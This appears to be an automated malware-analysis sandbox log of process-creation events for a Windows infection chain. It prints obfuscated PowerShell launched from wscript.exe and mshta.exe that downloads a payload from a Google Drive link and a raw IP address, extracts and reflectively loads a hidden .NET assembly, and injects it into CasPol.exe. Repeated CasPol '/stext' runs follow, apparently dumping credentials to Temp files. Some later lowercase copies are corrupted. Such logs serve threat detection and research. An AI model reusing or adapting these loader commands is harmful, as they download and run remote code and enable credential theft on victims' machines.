          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ccpqkvncszlcdyhupbgkfnqpbhfycgj"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oyzblyj"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\owwdnwiorrwlyboscy"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\owwdnwiorrwlyboscy"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\owwdnwiorrwlyboscy"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\qqcnootpfzoqahkwlihmmg"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\qqcnootpfzoqahkwlihmmg"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\qqcnootpfzoqahkwlihmmg"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\qqcnootpfzoqahkwlihmmg"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\bthgghdjthgdlvyictcnxlwgz"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: unknown unknown
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jfhetklvvk0yvtjqicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagieferc10exbficagicagicagicagicagicagicagicagicagicagicaglu1fbujfcmrlrmlosvrjt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjsbu9uiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagd0xbywd3b3csc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagbixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbhumosdwludcagicagicagicagicagicagicagicagicagicagicagigd3ccxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbxdlcpoycgicagicagicagicagicagicagicagicagicagicagicattmftzsagicagicagicagicagicagicagicagicagicagicagicjizutsqxf0qweiicagicagicagicagicagicagicagicagicagicagicaglw5hbwvtcgfdzsagicagicagicagicagicagicagicagicagicagicagihb1tlfcdkdfdsagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakwerosvvwttjvmla6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xmdcumtc0lje0ni40ni81ny9wawn0dxjld2l0agdyzwf0bmv3c3dpdghnb29kdghpbmdzb25izxn0cgxhy2uudelgiiwijevuvjpbufbeqvrbxhbpy3r1cmv3axroz3jlyxruzxdzd2l0agdvb2r0agluz3nvbmjllnzicyismcwwktttvefydc1zbgvlccgzktttdgfydcagicagicagicagicagicagicagicagicagicagicagicikzw52okfquerbvefccgljdhvyzxdpdghncmvhdg5ld3n3axroz29vzhroaw5nc29uymuudmjzig=='+[char]34+'))')))"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggjhbzsg9nrvsymv0rjfbzae9trvszmf0rj3gnksgoj1prywltywdlvxjsid0guun4ahqnkyd0chm6ly9kcml2zs5nb29nbguuy29tl3vjp2v4cg9ydd1kb3dubg9hzczpzd0xqulwz0pksnyxrjynkyd2uzrzvu95ym5ilxnedlvoqll3dxiguun4o1pryxdlyknsawvudca9ie5ldy1pymply3qgu3knkydzdgvtlk5ldc5xzwjdbgllbnq7wmthaw1hz2vcjysnexrlcya9ifpryxdlyknsawvudc5eb3dubg9hzerhdgeowmthaw1hz2vvcmwpo1prywltywdlvgv4dca9ifttexn0jysnzw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkfprywltywdlqnl0zxmpo1pryxn0yxj0rmxhzya9iffdedwnkyc8qkftrty0x1nuqvjupj5rq3g7wmthzw5krmxhzya9iffdedw8qkftrty0x0vord4+uun4o1pryxn0yxj0sw5kzxggpsbaa2fpbwfnzvrlehqusw5kzxhpzihaa2fzdgfydezsywcpo1prywvuzeluzgv4id0gwmthaw1hz2vuzxh0lkluzgv4t2yowmthzw5krmxhzycrjyk7wmthc3rhcnrjbmrlecatz2ugmcatyw4nkydkifprywvuzeluzgv4ic1ndcbajysna2fzdccrj2fydeluzgv4o1pryxn0yxj0sw4nkydkzxggkz0gwmthc3rhcnrgbgfnlkxlbmd0adtaa2fiyxnlnjrmzw5ndggnkycgpsbaa2flbmrjbmrlecatifpryxn0yxj0sw5kzxg7wmthymfzzty0q29tbwfuzca9ifprywltywdlvgv4dc5tdwjzdhjpbicrj2cowmthc3rhcnrjbmrlecwgjysnwmthymfzjysnzty0tgvuz3rokttaa2fiyxnlnjrszxzlcnnlzca9ic1qb2luichaa2fiyxnlnjrdb21tyw5kllrvq2hhckfycmf5kckgs041iezvckvhy2gtt2jqzwn0ihsgwmsnkydhxyb9kvstms4ulshaa2fijysnyxmnkydlnjrdb21tyw5klkxlbmd0acldo1prywnvbw1hbmrcexrlcya9ifttexn0zw0ujysnq29udmvydf06okzyb21cyxnljysnnjrtdhjpbmcowmthymfzzty0umv2zxjzzwqpo1prywxvywrlzefzc2vtymx5id0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzchaa2fjb21tyscrj25kqnl0zxmpo1pryxzhau1ldghvzca9iftkbmxpyi5jty5ib21lxs5hzscrj3rnzxrob2qouun4vkfjuun4kttaa2f2ywlnzxrob2qusw52b2tlkfpryw51bgwsieaouun4dhh0lljsrlzhr0zslzc1lzy0ljy0ms40nzeunzaxly86chr0affdecwguun4zgvzyxrpdmfkb1fdecwguumnkyd4zgvzyxrpdmfkb1fdecwguun4zgvzyxrpdmfkb1fdecwguun4q2fzjysnug9suun4lcbrq3hkzxnhdgl2ywrvuscrj0n4lcbrq3hkzxnhdgl2ywrvuun4lffdegrlc2f0axzhzg9rq3gsuun4zgvzyxrpdmfkb1fdecxrq3hkzxnhdgl2ywrvuun4lffdegrlc2f0axzhzg9rq3gsuun4zgvzyxrpdmfkb1fdecxrq3gxuun4lffdegrlc2f0axzhzg9rq3gpktsnks5yrvbmyunlkchby0hhul05mctby0hhul0xmdcrw2niyvjdotcplftzvhjjbmddw2niyvjdmzyplnjfuexhq2uoj0tonscsw3nuckluz11by0hhul0xmjqplnjfuexhq2uokftjsgfsxtgxk1tjsgfsxty3k1tjsgfsxteymcksw3nuckluz11by0hhul0zoskp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $pshome[21]+$pshome[30]+'x')(('zkaimageurl = qcxht'+'tps://drive.google.com/uc?export=download&id=1aivgjjjv1f6'+'vs4suoybnh-sdvuhbywur qcx;zkawebclient = new-object sy'+'stem.net.webclient;zkaimageb'+'ytes = zkawebclient.downloaddata(zkaimageurl);zkaimagetext = [syst'+'em.text.encoding]::utf8.getstring(zkaimagebytes);zkastartflag = qcx<'+'<base64_start>>qcx;zkaendflag = qcx<<base64_end>>qcx;zkastartindex = zkaimagetext.indexof(zkastartflag);zkaendindex = zkaimagetext.indexof(zkaendflag'+');zkastartindex -ge 0 -an'+'d zkaendindex -gt z'+'kast'+'artindex;zkastartin'+'dex += zkastartflag.length;zkabase64length'+' = zkaendindex - zkastartindex;zkabase64command = zkaimagetext.substrin'+'g(zkastartindex, '+'zkabas'+'e64length);zkabase64reversed = -join (zkabase64command.tochararray() kn5 foreach-object { zk'+'a_ })[-1..-(zkab'+'as'+'e64command.length)];zkacommandbytes = [system.'+'convert]::frombase'+'64string(zkabase64reversed);zkaloadedassembly = [system.reflection.assembly]::load(zkacomma'+'ndbytes);zkavaimethod = [dnlib.io.home].ge'+'tmethod(qcxvaiqcx);zkavaimethod.invoke(zkanull, @(qcxtxt.rrfvggfr/75/64.641.471.701//:ptthqcx, qcxdesativadoqcx, qc'+'xdesativadoqcx, qcxdesativadoqcx, qcxcas'+'polqcx, qcxdesativadoq'+'cx, qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcx1qcx,qcxdesativadoqcx));').replace(([char]90+[char]107+[char]97),[string][char]36).replace('kn5',[string][char]124).replace(([char]81+[char]67+[char]120),[string][char]39))"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jfhetklvvk0yvtjqicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagieferc10exbficagicagicagicagicagicagicagicagicagicagicaglu1fbujfcmrlrmlosvrjt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjsbu9uiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagd0xbywd3b3csc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagbixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbhumosdwludcagicagicagicagicagicagicagicagicagicagicagigd3ccxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbxdlcpoycgicagicagicagicagicagicagicagicagicagicagicattmftzsagicagicagicagicagicagicagicagicagicagicagicjizutsqxf0qweiicagicagicagicagicagicagicagicagicagicagicaglw5hbwvtcgfdzsagicagicagicagicagicagicagicagicagicagicagihb1tlfcdkdfdsagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakwerosvvwttjvmla6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xmdcumtc0lje0ni40ni81ny9wawn0dxjld2l0agdyzwf0bmv3c3dpdghnb29kdghpbmdzb25izxn0cgxhy2uudelgiiwijevuvjpbufbeqvrbxhbpy3r1cmv3axroz3jlyxruzxdzd2l0agdvb2r0agluz3nvbmjllnzicyismcwwktttvefydc1zbgvlccgzktttdgfydcagicagicagicagicagicagicagicagicagicagicagicikzw52okfquerbvefccgljdhvyzxdpdghncmvhdg5ld3n3axroz29vzhroaw5nc29uymuudmjzig=='+[char]34+'))')))"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggjhbzsg9nrvsymv0rjfbzae9trvszmf0rj3gnksgoj1prywltywdlvxjsid0guun4ahqnkyd0chm6ly9kcml2zs5nb29nbguuy29tl3vjp2v4cg9ydd1kb3dubg9hzczpzd0xqulwz0pksnyxrjynkyd2uzrzvu95ym5ilxnedlvoqll3dxiguun4o1pryxdlyknsawvudca9ie5ldy1pymply3qgu3knkydzdgvtlk5ldc5xzwjdbgllbnq7wmthaw1hz2vcjysnexrlcya9ifpryxdlyknsawvudc5eb3dubg9hzerhdgeowmthaw1hz2vvcmwpo1prywltywdlvgv4dca9ifttexn0jysnzw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkfprywltywdlqnl0zxmpo1pryxn0yxj0rmxhzya9iffdedwnkyc8qkftrty0x1nuqvjupj5rq3g7wmthzw5krmxhzya9iffdedw8qkftrty0x0vord4+uun4o1pryxn0yxj0sw5kzxggpsbaa2fpbwfnzvrlehqusw5kzxhpzihaa2fzdgfydezsywcpo1prywvuzeluzgv4id0gwmthaw1hz2vuzxh0lkluzgv4t2yowmthzw5krmxhzycrjyk7wmthc3rhcnrjbmrlecatz2ugmcatyw4nkydkifprywvuzeluzgv4ic1ndcbajysna2fzdccrj2fydeluzgv4o1pryxn0yxj0sw4nkydkzxggkz0gwmthc3rhcnrgbgfnlkxlbmd0adtaa2fiyxnlnjrmzw5ndggnkycgpsbaa2flbmrjbmrlecatifpryxn0yxj0sw5kzxg7wmthymfzzty0q29tbwfuzca9ifprywltywdlvgv4dc5tdwjzdhjpbicrj2cowmthc3rhcnrjbmrlecwgjysnwmthymfzjysnzty0tgvuz3rokttaa2fiyxnlnjrszxzlcnnlzca9ic1qb2luichaa2fiyxnlnjrdb21tyw5kllrvq2hhckfycmf5kckgs041iezvckvhy2gtt2jqzwn0ihsgwmsnkydhxyb9kvstms4ulshaa2fijysnyxmnkydlnjrdb21tyw5klkxlbmd0acldo1prywnvbw1hbmrcexrlcya9ifttexn0zw0ujysnq29udmvydf06okzyb21cyxnljysnnjrtdhjpbmcowmthymfzzty0umv2zxjzzwqpo1prywxvywrlzefzc2vtymx5id0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzchaa2fjb21tyscrj25kqnl0zxmpo1pryxzhau1ldghvzca9iftkbmxpyi5jty5ib21lxs5hzscrj3rnzxrob2qouun4vkfjuun4kttaa2f2ywlnzxrob2qusw52b2tlkfpryw51bgwsieaouun4dhh0lljsrlzhr0zslzc1lzy0ljy0ms40nzeunzaxly86chr0affdecwguun4zgvzyxrpdmfkb1fdecwguumnkyd4zgvzyxrpdmfkb1fdecwguun4zgvzyxrpdmfkb1fdecwguun4q2fzjysnug9suun4lcbrq3hkzxnhdgl2ywrvuscrj0n4lcbrq3hkzxnhdgl2ywrvuun4lffdegrlc2f0axzhzg9rq3gsuun4zgvzyxrpdmfkb1fdecxrq3hkzxnhdgl2ywrvuun4lffdegrlc2f0axzhzg9rq3gsuun4zgvzyxrpdmfkb1fdecxrq3gxuun4lffdegrlc2f0axzhzg9rq3gpktsnks5yrvbmyunlkchby0hhul05mctby0hhul0xmdcrw2niyvjdotcplftzvhjjbmddw2niyvjdmzyplnjfuexhq2uoj0tonscsw3nuckluz11by0hhul0xmjqplnjfuexhq2uokftjsgfsxtgxk1tjsgfsxty3k1tjsgfsxteymcksw3nuckluz11by0hhul0zoskp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $pshome[21]+$pshome[30]+'x')(('zkaimageurl = qcxht'+'tps://drive.google.com/uc?export=download&id=1aivgjjjv1f6'+'vs4suoybnh-sdvuhbywur qcx;zkawebclient = new-object sy'+'stem.net.webclient;zkaimageb'+'ytes = zkawebclient.downloaddata(zkaimageurl);zkaimagetext = [syst'+'em.text.encoding]::utf8.getstring(zkaimagebytes);zkastartflag = qcx<'+'<base64_start>>qcx;zkaendflag = qcx<<base64_end>>qcx;zkastartindex = zkaimagetext.indexof(zkastartflag);zkaendindex = zkaimagetext.indexof(zkaendflag'+');zkastartindex -ge 0 -an'+'d zkaendindex -gt z'+'kast'+'artindex;zkastartin'+'dex += zkastartflag.length;zkabase64length'+' = zkaendindex - zkastartindex;zkabase64command = zkaimagetext.substrin'+'g(zkastartindex, '+'zkabas'+'e64length);zkabase64reversed = -join (zkabase64command.tochararray() kn5 foreach-object { zk'+'a_ })[-1..-(zkab'+'as'+'e64command.length)];zkacommandbytes = [system.'+'convert]::frombase'+'64string(zkabase64reversed);zkaloadedassembly = [system.reflection.assembly]::load(zkacomma'+'ndbytes);zkavaimethod = [dnlib.io.home].ge'+'tmethod(qcxvaiqcx);zkavaimethod.invoke(zkanull, @(qcxtxt.rrfvggfr/75/64.641.471.701//:ptthqcx, qcxdesativadoqcx, qc'+'xdesativadoqcx, qcxdesativadoqcx, qcxcas'+'polqcx, qcxdesativadoq'+'cx, qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcx1qcx,qcxdesativadoqcx));').replace(([char]90+[char]107+[char]97),[string][char]36).replace('kn5',[string][char]124).replace(([char]81+[char]67+[char]120),[string][char]39))"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jfhetklvvk0yvtjqicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagieferc10exbficagicagicagicagicagicagicagicagicagicagicaglu1fbujfcmrlrmlosvrjt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjsbu9uiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagd0xbywd3b3csc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagbixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbhumosdwludcagicagicagicagicagicagicagicagicagicagicagigd3ccxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbxdlcpoycgicagicagicagicagicagicagicagicagicagicagicat